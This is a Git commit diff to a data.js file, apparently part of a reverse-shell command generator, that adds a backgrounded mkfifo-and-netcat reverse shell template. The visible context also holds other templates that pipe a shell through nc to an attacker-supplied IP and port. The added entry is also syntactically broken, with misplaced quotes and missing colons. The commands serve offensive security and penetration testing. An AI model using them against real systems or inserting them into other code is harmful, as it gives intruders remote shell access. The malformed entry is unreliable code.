Update data.js

Added mkfifo backgrounded shell
This commit is contained in:
Ryan Montgomery 2022-06-06 11:43:20 -04:00 committed by GitHub
parent 045a40e3ca
commit f509313697
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -50,6 +50,11 @@ const reverseShellCommands = withCommandType(
"command": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f",
"meta": ["linux", "mac"]
},
{
"name:" "mkfifo background",
"command" "(mkfifo \/tmp\/MmE1M; nc {ip} {port} 0<\/tmp\/MmE1M | {shell} >\/tmp\/MmE1M 2>&1; rm \/tmp\/MmE1M) &",
"meta" ["linux", "mac"]
},
{
"name": "nc -e",
"command": "nc -e {shell} {ip} {port}",